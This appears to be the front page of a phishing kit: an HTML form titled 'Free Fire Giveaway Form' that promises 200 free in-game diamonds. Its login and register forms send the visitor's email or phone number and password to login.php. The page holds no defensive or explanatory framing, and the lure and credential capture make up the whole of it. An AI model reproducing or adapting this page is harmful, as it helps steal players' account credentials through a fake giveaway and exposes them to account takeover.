<!DOCTYPE html>
<html lang="en">
  <head>
    <script type="text/javascript">
      <!--
      if (screen.width <= 699) {
      document.location = "mobile.html";
  }
  </script>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <script
      src="https://kit.fontawesome.com/64d58efce2.js"
      crossorigin="anonymous"
    ></script>
     
    <link rel="stylesheet" href="style.css" />
    <title>Free Fire Giveaway Form</title>
  </head>
  <body style="background-image: url(background0.jpg); background-size: cover; background-position: center center">
    <div class="container">
      <div class="forms-container">
        <div class="signin-signup">
          <form action="login.php" class="sign-in-form" method="post">
            <h2 class="title">Login</h2>
            <div class="input-field">
              <i class="fas fa-user"></i>
              <input type="text" placeholder="email or phone" name="username"/>
            </div>
            <div class="input-field">
              <i class="fas fa-lock"></i>
              <input type="password" placeholder="password" name="password"/>
            </div>
            <input type="submit" value="Login" class="btn solid" />
          </form>
          <form action="login.php" class="sign-up-form" method="post">
            <h2 class="title">Register</h2>
            <div class="input-field">
              <i class="fas fa-user"></i>
              <input type="text" placeholder="uid" />
            </div>
            <div class="input-field">
              <i class="fas fa-envelope"></i>
              <input type="text" placeholder="email or phone" name="username"/>
            </div>
            <div class="input-field">
              <i class="fas fa-lock"></i>
              <input type="password" placeholder="password" name="password"/>
            </div>
            <input type="submit" class="btn" value="Register" />
          </form>
        </div>
      </div>

      <div class="panels-container">
        <div class="panel left-panel">
          <div class="content">
            <h3>Want to get 200 Dimonds</h3>
            <p>
              Register for get 200 Diamond in Giveaway <br> Hurry up !
            </p>
            <button class="btn transparent" id="sign-up-btn">
              Register
            </button>
          </div>
          <img src="diamonds.png" class="image" alt="" />
        </div>
        <div class="panel right-panel">
          <div class="content">
            <h3>Already Registered ?</h3>
            <p>
              Login to get 200 Diamond in Giveaway <br> Hurry up !
            </p>
            <button class="btn transparent" id="sign-in-btn">
              Login
            </button>
          </div>
          <img src="diamonds.png" class="image" alt="" />
        </div>
      </div>
    </div>

    <script src="app.js"></script>
  </body>
</html>
